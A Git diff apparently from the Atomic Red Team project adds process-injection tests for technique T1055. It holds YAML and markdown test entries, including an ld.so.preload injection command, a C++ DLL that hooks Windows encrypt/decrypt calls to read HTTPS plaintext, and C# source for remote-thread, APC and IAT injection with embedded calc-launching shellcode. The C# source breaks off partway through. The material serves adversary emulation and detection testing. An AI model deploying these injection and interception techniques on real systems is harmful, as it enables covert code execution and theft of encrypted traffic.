 Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
 ```
 <br/>
+<br/>
+
+## Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload
+This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
+
+**Supported Platforms:** Linux
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| path_to_shared_library | Path to a shared library object | Path | /tmp/evil_module.so|
+
+#### Run it with `bash`!
+```
+echo #{path_to_shared_library} > /etc/ld.so.preload
+```
+<br/>
+<br/>
+
+## Atomic Test #4 - Process Injection via C#
+Process Injection using C#
+reference: https://github.com/pwndizzle/c-sharp-memory-injection
+Excercises Five Techniques
+1. Process injection
+2. ApcInjectionAnyProcess
+3. ApcInjectionNewProcess
+4. IatInjection
+5. ThreadHijack
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| exe_binary | Output Binary | Path | T1055.exe|
+
+#### Run it with `command_prompt`!
+```
+.\bin\#{exe_binary}
+```
+<br/>
@@ -14,7 +14,7 @@ atomic_tests:
    dll_payload:
      description: DLL to Inject
      type: Path
-      default: T1055.dll
+      default: C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll
    process_id:
      description: PID of input_arguments
      type: Int
@@ -23,9 +23,10 @@ atomic_tests:
    name: powershell
    command: |
      mavinject $pid /INJECTRUNNING #{dll_payload}
+
 - name: Process Injection via PowerSploit
  description: |
-    PowerShell Injection
+    PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)

  supported_platforms:
    - windows
@@ -43,3 +44,41 @@ atomic_tests:
    name: powershell
    command: |
      Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
+
+- name: Shared Library Injection via /etc/ld.so.preload
+  description: |
+    This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
+  supported_platforms:
+    - linux
+  input_arguments:
+    path_to_shared_library:
+      description: Path to a shared library object
+      type: Path
+      default: /tmp/evil_module.so
+  executor:
+    name: bash
+    command: |
+      echo #{path_to_shared_library} > /etc/ld.so.preload
+- name: Process Injection via C#
+  description: |
+    Process Injection using C#
+    reference: https://github.com/pwndizzle/c-sharp-memory-injection
+    Excercises Five Techniques
+    1. Process injection
+    2. ApcInjectionAnyProcess
+    3. ApcInjectionNewProcess
+    4. IatInjection
+    5. ThreadHijack
+
+  supported_platforms:
+    - windows
+
+  input_arguments:
+    exe_binary:
+      description: Output Binary
+      type: Path
+      default: T1055.exe
+  executor:
+    name: command_prompt
+    command: |
+      .\bin\#{exe_binary}
@@ -0,0 +1,147 @@
+#define SECURITY_WIN32 //Define First Before Imports.
+
+#include <windows.h>
+#include <stdio.h>
+#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies
+
+FARPROC fpEncryptMessage; //Pointer To The Original Location
+BYTE bSavedByte; //Saved Byte Overwritten by 0xCC -
+
+FARPROC fpDecryptMessage; //Pointer To The Original Location
+BYTE bSavedByte2; //Saved Byte Overwritten by 0xCC -
+
+
+// Original Idea/Reference Blog Post Here:
+// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
+// PoC by Casey Smith @subTee
+// From PowerShell
+// mavinject.exe $pid /INJECTRUNNING C:\AtomicTests\AtomicSSLHookx64.dll
+// curl https://www.example.com
+// Should Hook and Display Request/Response from HTTPS
+
+
+
+
+BOOL WriteMemory(FARPROC fpFunc, LPCBYTE b, SIZE_T size) {
+	DWORD dwOldProt = 0;
+	if (VirtualProtect(fpFunc, size, PAGE_EXECUTE_READWRITE, &dwOldProt) == FALSE) {
+		return FALSE;
+	}
+	MoveMemory(fpFunc, b, size);
+
+	return VirtualProtect(fpFunc, size, dwOldProt, &dwOldProt);
+}
+
+//TODO, Combine  HOOK Function To take 2 params. DLL and Function Name.
+VOID HookFunction(VOID) {
+	fpEncryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "EncryptMessage");
+	if (fpEncryptMessage == NULL) {
+		return;
+	}
+
+	bSavedByte = *(LPBYTE)fpEncryptMessage;
+
+	const BYTE bInt3 = 0xCC;
+	if (WriteMemory(fpEncryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
+		ExitThread(0);
+	}
+}
+
+VOID HookFunction2(VOID) {
+	fpDecryptMessage = GetProcAddress(LoadLibrary(L"sspicli.dll"), "DecryptMessage");
+	if (fpDecryptMessage == NULL) {
+		return;
+	}
+
+	bSavedByte2 = *(LPBYTE)fpDecryptMessage;
+
+	const BYTE bInt3 = 0xCC;
+	if (WriteMemory(fpDecryptMessage, &bInt3, sizeof(BYTE)) == FALSE) {
+		ExitThread(0);
+	}
+}
+
+SECURITY_STATUS MyEncryptMessage(
+	PCtxtHandle    phContext,
+	ULONG          fQOP,
+	PSecBufferDesc pMessage,
+	ULONG          MessageSeqNo
+)
+{
+
+	char* buffer = (char*)((DWORD_PTR)(pMessage->pBuffers->pvBuffer) + 0x29); //Just Hardcode for PoC
+
+	::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
+
+	if (WriteMemory(fpEncryptMessage, &bSavedByte, sizeof(BYTE)) == FALSE) {
+		ExitThread(0);
+	}
+
+	SECURITY_STATUS SEC_EntryRet = EncryptMessage(phContext, fQOP, pMessage, MessageSeqNo);
+	HookFunction();
+	return SEC_EntryRet;
+}
+
+SECURITY_STATUS MyDecryptMessage(
+	PCtxtHandle    phContext,
+	PSecBufferDesc pMessage,
+	ULONG          MessageSeqNo,
+	ULONG          fQOP
+)
+{
+
+	if (WriteMemory(fpDecryptMessage, &bSavedByte2, sizeof(BYTE)) == FALSE) {
+		ExitThread(0);
+	}
+
+	SECURITY_STATUS SEC_EntryRet = DecryptMessage(phContext, pMessage, MessageSeqNo, &fQOP );
+
+	char* buffer = (char*)(pMessage->pBuffers->pvBuffer);
+
+	::MessageBoxA(NULL, buffer, "MITM Intercept", 0);
+
+	HookFunction2();
+	return SEC_EntryRet;
+}
+
+
+LONG WINAPI
+MyVectoredExceptionHandler1(
+	struct _EXCEPTION_POINTERS *ExceptionInfo
+)
+{
+		UNREFERENCED_PARAMETER(ExceptionInfo);
+#ifdef _WIN64
+	if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpEncryptMessage) {
+		ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyEncryptMessage;
+	}
+
+	if (ExceptionInfo->ContextRecord->Rip == (DWORD_PTR)fpDecryptMessage) {
+		ExceptionInfo->ContextRecord->Rip = (DWORD_PTR)MyDecryptMessage;
+	}
+
+#else
+	if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpEncryptMessage) {
+		ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyEncryptMessage;
+	}
+
+	if (ExceptionInfo->ContextRecord->Eip == (DWORD_PTR)fpDecryptMessage) {
+		ExceptionInfo->ContextRecord->Eip = (DWORD_PTR)MyDecryptMessage;
+	}
+
+#endif
+	return EXCEPTION_CONTINUE_SEARCH;
+}
+
+BOOL APIENTRY DllMain(HANDLE hInstance, DWORD fdwReason, LPVOID lpReserved) {
+	switch (fdwReason) {
+	case DLL_PROCESS_ATTACH:
+		AddVectoredExceptionHandler(1, (PVECTORED_EXCEPTION_HANDLER)MyVectoredExceptionHandler1);
+		HookFunction();
+		HookFunction2();
+		::MessageBoxA(NULL, "Locked and Loaded!", "Boom!", 0);
+		break;
+	}
+
+	return TRUE;
+}
@@ -0,0 +1,1147 @@
+//Atomic Process Injection Tests
+//xref: https://github.com/pwndizzle/c-sharp-memory-injection
+
+// https://github.com/peterferrie/win-exec-calc-shellcode
+
+// To run:
+// 1. Compile code - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:..\bin\T1055.exe T1055.cs
+//
+
+
+
+using System;
+using System.Reflection;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using System.IO;
+using System.IO.Compression;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Text;
+
+public class ProcessInject
+{
+    [DllImport("kernel32.dll")]
+    public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
+
+    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
+    public static extern IntPtr GetModuleHandle(string lpModuleName);
+
+    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
+    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+
+    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
+    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect);
+
+    [DllImport("kernel32.dll", SetLastError = true)]
+    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
+
+    [DllImport("kernel32.dll")]
+    static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
+
+    [DllImport("kernel32.dll")]
+    static extern IntPtr CreateRemoteThread(IntPtr hProcess,
+        IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+
+    // privileges
+    const int PROCESS_CREATE_THREAD = 0x0002;
+    const int PROCESS_QUERY_INFORMATION = 0x0400;
+    const int PROCESS_VM_OPERATION = 0x0008;
+    const int PROCESS_VM_WRITE = 0x0020;
+    const int PROCESS_VM_READ = 0x0010;
+
+    // used for memory allocation
+    const uint MEM_COMMIT = 0x00001000;
+    const uint MEM_RESERVE = 0x00002000;
+    const uint PAGE_READWRITE = 4;
+
+    public static int Inject()
+    {
+
+        // Get process id
+        Console.WriteLine("Get process by name...");
+		System.Diagnostics.Process.Start("notepad");
+	Process targetProcess = Process.GetProcessesByName("notepad")[0];
+
+
+        // Get handle of the process - with required privileges
+
+        IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
+
+
+        // Get address of LoadLibraryA and store in a pointer
+
+        IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
+
+
+        // Path to dll that will be injected
+        string dllName = @"C:\AtomicRedTeam\atomics\T1055\bin\w64-exec-calc-shellcode.dll";
+
+        // Allocate memory for dll path and store pointer
+
+        IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+
+        // Write path of dll to memory
+
+        UIntPtr bytesWritten;
+        bool resp1 = WriteProcessMemory(procHandle, allocMemAddress, System.Text.Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
+
+	// Read contents of memory
+	int bytesRead = 0;
+        byte[] buffer = new byte[24];
+
+	ReadProcessMemory(procHandle, allocMemAddress, buffer, buffer.Length, ref bytesRead);
+        Console.WriteLine("Data in memory: " + System.Text.Encoding.UTF8.GetString(buffer));
+
+        // Create a thread that will call LoadLibraryA with allocMemAddress as argument
+
+        CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);
+
+        return 0;
+    }
+}
+
+public class ApcInjectionAnyProcess
+{
+	public static void Inject()
+	{
+
+		byte[] shellcode = new byte[112] {
+		0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
+		};
+
+		// Open process. "explorer" is a good target due to the large number of threads which will enter alertable state
+		Process targetProcess = Process.GetProcessesByName("notepad")[0];
+		IntPtr procHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
+
+		// Allocate memory within process and write shellcode
+		IntPtr resultPtr = VirtualAllocEx(procHandle, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+		IntPtr bytesWritten = IntPtr.Zero;
+		bool resultBool = WriteProcessMemory(procHandle,resultPtr,shellcode,shellcode.Length, out bytesWritten);
+
+		// Modify memory permissions on shellcode from XRW to XR
+		uint oldProtect = 0;
+		resultBool = VirtualProtectEx(procHandle, resultPtr, shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);
+
+		// Iterate over threads and queueapc
+		foreach (ProcessThread thread in targetProcess.Threads)
+                {
+			//Get handle to thread
+			IntPtr tHandle = OpenThread(ThreadAccess.THREAD_HIJACK, false, (int)thread.Id);
+
+			//Assign APC to thread to execute shellcode
+			IntPtr ptr = QueueUserAPC(resultPtr, tHandle, IntPtr.Zero);
+		  }
+	}
+
+	// Memory permissions
+	private static UInt32 MEM_COMMIT = 0x1000;
+	private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
+	//private static UInt32 PAGE_READWRITE = 0x04;
+	private static UInt32 PAGE_EXECUTE_READ = 0x20;
+
+	// Process privileges
+      const int PROCESS_CREATE_THREAD = 0x0002;
+      const int PROCESS_QUERY_INFORMATION = 0x0400;
+      const int PROCESS_VM_OPERATION = 0x0008;
+      const int PROCESS_VM_WRITE = 0x0020;
+      const int PROCESS_VM_READ = 0x0010;
+
+	[Flags]
+    public enum ThreadAccess : int
+    {
+      TERMINATE = (0x0001),
+      SUSPEND_RESUME = (0x0002),
+      GET_CONTEXT = (0x0008),
+      SET_CONTEXT = (0x0010),
+      SET_INFORMATION = (0x0020),
+      QUERY_INFORMATION = (0x0040),
+      SET_THREAD_TOKEN = (0x0080),
+      IMPERSONATE = (0x0100),
+      DIRECT_IMPERSONATION = (0x0200),
+	    THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT,
+	    THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION
+    }
+
+	[DllImport("kernel32.dll", SetLastError = true)]
+	public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
+		int dwThreadId);
+
+	[DllImport("kernel32.dll",SetLastError = true)]
+	public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
+
+	[DllImport("kernel32.dll")]
+	public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
+
+	[DllImport("kernel32")]
+	public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
+		 Int32 size, UInt32 flAllocationType, UInt32 flProtect);
+
+	[DllImport("kernel32.dll", SetLastError = true )]
+	public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
+	Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
+
+	[DllImport("kernel32.dll", SetLastError = true)]
+	public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
+
+	[DllImport("kernel32.dll")]
+	public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
+	int dwSize, uint flNewProtect, out uint lpflOldProtect);
+}
+
+public class ApcInjectionNewProcess
+{
+	public static void Inject()
+	{
+
+		byte[] shellcode = new byte[112] {
+		0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
+		};
+
+		// Target process to inject into
+		string processpath = @"C:\Windows\notepad.exe";
+		STARTUPINFO si = new STARTUPINFO();
+		PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
+
+		// Create new process in suspended state to inject into
+		bool success = CreateProcess(processpath, null,
+			IntPtr.Zero, IntPtr.Zero, false,
+			ProcessCreationFlags.CREATE_SUSPENDED,
+			IntPtr.Zero, null, ref si, out pi);
+
+		// Allocate memory within process and write shellcode
+		IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE);
+		IntPtr bytesWritten = IntPtr.Zero;
+		bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten);
+
+		// Open thread
+		IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
+		uint oldProtect = 0;
+
+		// Modify memory permissions on allocated shellcode
+		resultBool = VirtualProtectEx(pi.hProcess,resultPtr, shellcode.Length,PAGE_EXECUTE_READ, out oldProtect);
+
+		// Assign address of shellcode to the target thread apc queue
+		IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
+
+		IntPtr ThreadHandle = pi.hThread;
+		ResumeThread(ThreadHandle);
+
+	}
+
+
+	private static UInt32 MEM_COMMIT = 0x1000;
+
+	//private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; //I'm not using this #DFIR  ;-)
+	private static UInt32 PAGE_READWRITE = 0x04;
+	private static UInt32 PAGE_EXECUTE_READ = 0x20;
+
+
+	[Flags]
+	public enum ProcessAccessFlags : uint
+	{
+		All = 0x001F0FFF,
+		Terminate = 0x00000001,
+		CreateThread = 0x00000002,
+		VirtualMemoryOperation = 0x00000008,
+		VirtualMemoryRead = 0x00000010,
+		VirtualMemoryWrite = 0x00000020,
+		DuplicateHandle = 0x00000040,
+		CreateProcess = 0x000000080,
+		SetQuota = 0x00000100,
+		SetInformation = 0x00000200,
+		QueryInformation = 0x00000400,
+		QueryLimitedInformation = 0x00001000,
+		Synchronize = 0x00100000
+	}
+
+	[Flags]
+	public enum ProcessCreationFlags : uint
+	{
+		ZERO_FLAG = 0x00000000,
+		CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
+		CREATE_DEFAULT_ERROR_MODE = 0x04000000,
+		CREATE_NEW_CONSOLE = 0x00000010,
+		CREATE_NEW_PROCESS_GROUP = 0x00000200,
+		CREATE_NO_WINDOW = 0x08000000,
+		CREATE_PROTECTED_PROCESS = 0x00040000,
+		CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
+		CREATE_SEPARATE_WOW_VDM = 0x00001000,
+		CREATE_SHARED_WOW_VDM = 0x00001000,
+		CREATE_SUSPENDED = 0x00000004,
+		CREATE_UNICODE_ENVIRONMENT = 0x00000400,
+		DEBUG_ONLY_THIS_PROCESS = 0x00000002,
+		DEBUG_PROCESS = 0x00000001,
+		DETACHED_PROCESS = 0x00000008,
+		EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
+		INHERIT_PARENT_AFFINITY = 0x00010000
+	}
+	public struct PROCESS_INFORMATION
+	{
+		public IntPtr hProcess;
+		public IntPtr hThread;
+		public uint dwProcessId;
+		public uint dwThreadId;
+	}
+	public struct STARTUPINFO
+	{
+		public uint cb;
+		public string lpReserved;
+		public string lpDesktop;
+		public string lpTitle;
+		public uint dwX;
+		public uint dwY;
+		public uint dwXSize;
+		public uint dwYSize;
+		public uint dwXCountChars;
+		public uint dwYCountChars;
+		public uint dwFillAttribute;
+		public uint dwFlags;
+		public short wShowWindow;
+		public short cbReserved2;
+		public IntPtr lpReserved2;
+		public IntPtr hStdInput;
+		public IntPtr hStdOutput;
+		public IntPtr hStdError;
+	}
+
+	[Flags]
+	public enum    ThreadAccess : int
+	{
+		TERMINATE           = (0x0001)  ,
+		SUSPEND_RESUME      = (0x0002)  ,
+		GET_CONTEXT         = (0x0008)  ,
+		SET_CONTEXT         = (0x0010)  ,
+		SET_INFORMATION     = (0x0020)  ,
+		QUERY_INFORMATION       = (0x0040)  ,
+		SET_THREAD_TOKEN    = (0x0080)  ,
+		IMPERSONATE         = (0x0100)  ,
+		DIRECT_IMPERSONATION    = (0x0200)
+	}
+
+	[DllImport("kernel32.dll", SetLastError = true)]
+	public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
+		int dwThreadId);
+
+	[DllImport("kernel32.dll",SetLastError = true)]
+	public static extern bool WriteProcessMemory(
+		IntPtr hProcess,
+		IntPtr lpBaseAddress,
+		byte[] lpBuffer,
+		int nSize,
+		out IntPtr lpNumberOfBytesWritten);
+
+	[DllImport("kernel32.dll")]
+	public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
+
+	[DllImport("kernel32")]
+	public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
+		 Int32 size, UInt32 flAllocationType, UInt32 flProtect);
+	[DllImport("kernel32.dll", SetLastError = true )]
+	public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
+	Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
+
+	[DllImport("kernel32.dll", SetLastError = true)]
+	public static extern IntPtr OpenProcess(
+	 ProcessAccessFlags processAccess,
+	 bool bInheritHandle,
+	 int processId
+	);
+
+
+	[DllImport("kernel32.dll")]
+	public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
+	[DllImport("kernel32.dll")]
+	public static extern uint ResumeThread(IntPtr hThread);
+	[DllImport("kernel32.dll")]
+	public static extern uint SuspendThread(IntPtr hThread);
+	[DllImport("kernel32.dll")]
+	public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
+	int dwSize, uint flNewProtect, out uint lpflOldProtect);
+}
+
+public class IatInjection
+{
+
+	public static void Inject()
+	{
+		string targetProcName = "notepad";
+		string targetFuncName = "CreateFileW";
+
+		// Get target process id and read memory contents
+		Process process = Process.GetProcessesByName(targetProcName)[0];
+		IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, process.Id);
+		int bytesRead = 0;
+		byte[] fileBytes = new byte[process.WorkingSet64];
+		ReadProcessMemory(hProcess, process.MainModule.BaseAddress, fileBytes, fileBytes.Length, ref bytesRead);
+
+		// The DOS header
+		IMAGE_DOS_HEADER dosHeader;
+
+		// The file header
+		IMAGE_FILE_HEADER fileHeader;
+
+		// Optional 32 bit file header
+		IMAGE_OPTIONAL_HEADER32 optionalHeader32 = new IMAGE_OPTIONAL_HEADER32();
+
+		// Optional 64 bit file header
+		IMAGE_OPTIONAL_HEADER64 optionalHeader64 = new IMAGE_OPTIONAL_HEADER64();
+
+		// Image Section headers
+		IMAGE_SECTION_HEADER[] imageSectionHeaders;
+
+		// Import descriptor for each DLL
+		IMAGE_IMPORT_DESCRIPTOR[] importDescriptors;
+
+		// Convert file bytes to memorystream and use reader
+		MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length);
+		BinaryReader reader = new BinaryReader(stream);
+
+		//Begin parsing structures
+		dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
+
+		// Add 4 bytes to the offset
+		stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
+
+		UInt32 ntHeadersSignature = reader.ReadUInt32();
+		fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
+		if (Is32BitHeader(fileHeader))
+		{
+			optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
+		}
+		else
+		{
+			optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
+		}
+
+		imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
+		for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
+		{
+			imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
+		}
+
+		// Go to ImportTable and parse every imported DLL
+		stream.Seek((long)((ulong)optionalHeader64.ImportTable.VirtualAddress), SeekOrigin.Begin);
+		importDescriptors = new IMAGE_IMPORT_DESCRIPTOR[50];
+
+		for (int i = 0; i < 50; i++)
+		{
+			importDescriptors[i] = FromBinaryReader<IMAGE_IMPORT_DESCRIPTOR>(reader);
+		}
+		bool flag = false;
+		int j = 0;
+
+		// The below is really hacky, would have been better to use structures!
+		while (j < importDescriptors.Length && !flag)
+		{
+			for (int k = 0; k < 1000; k++)
+			{
+				// Get the address for the function and its name
+
+				stream.Seek(importDescriptors[j].OriginalFirstThunk + (k * 8), SeekOrigin.Begin);
+
+				long nameOffset = reader.ReadInt64();
+				if (nameOffset > 1000000 || nameOffset < 0)
+				{
+					break;
+				}
+
+				// Get the function name
+				stream.Seek(nameOffset + 2, SeekOrigin.Begin);
+				List<string> list = new List<string>();
+				byte[] array;
+				do
+				{
+					array = reader.ReadBytes(1);
+					list.Add(Encoding.Default.GetString(array));
+				}
+				while (array[0] != 0);
+				string curFuncName = string.Join(string.Empty, list.ToArray());
+				curFuncName = curFuncName.Substring(0, curFuncName.Length - 1);
+
+				// Get the offset of the pointer to the target function and its current value
+				long funcOffset = importDescriptors[j].FirstThunk + (k * 8);
+				stream.Seek(funcOffset, SeekOrigin.Begin);
+				long curFuncAddr = reader.ReadInt64();
+
+				// Found target function, modify address to point to shellcode
+				if (curFuncName == targetFuncName)
+				{
+
+					// WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode
+					// nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin
+					byte[] payload = new byte[111] {
+					0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58
+					};
+
+					// Once shellcode has executed go to real import (mov to rax then jmp to address)
+					byte[] mov_rax = new byte[2] {
+						0x48, 0xb8
+					};
+					byte[] jmp_address = BitConverter.GetBytes(curFuncAddr);
+					byte[] jmp_rax = new byte[2] {
+						0xff, 0xe0
+					};
+
+					// Build shellcode
+					byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
+					payload.CopyTo(shellcode, 0);
+					mov_rax.CopyTo(shellcode, payload.Length);
+					jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length);
+					jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length);
+
+					// Allocate memory for shellcode
+					IntPtr shellcodeAddress = VirtualAllocEx(hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+
+					// Write shellcode to memory
+					IntPtr shellcodeBytesWritten = IntPtr.Zero;
+					WriteProcessMemory(hProcess,shellcodeAddress,shellcode,shellcode.Length, out shellcodeBytesWritten);
+
+					long funcAddress = (long)optionalHeader64.ImageBase + funcOffset;
+
+					// Get current value of IAT
+					bytesRead = 0;
+					byte[] buffer1 = new byte[8];
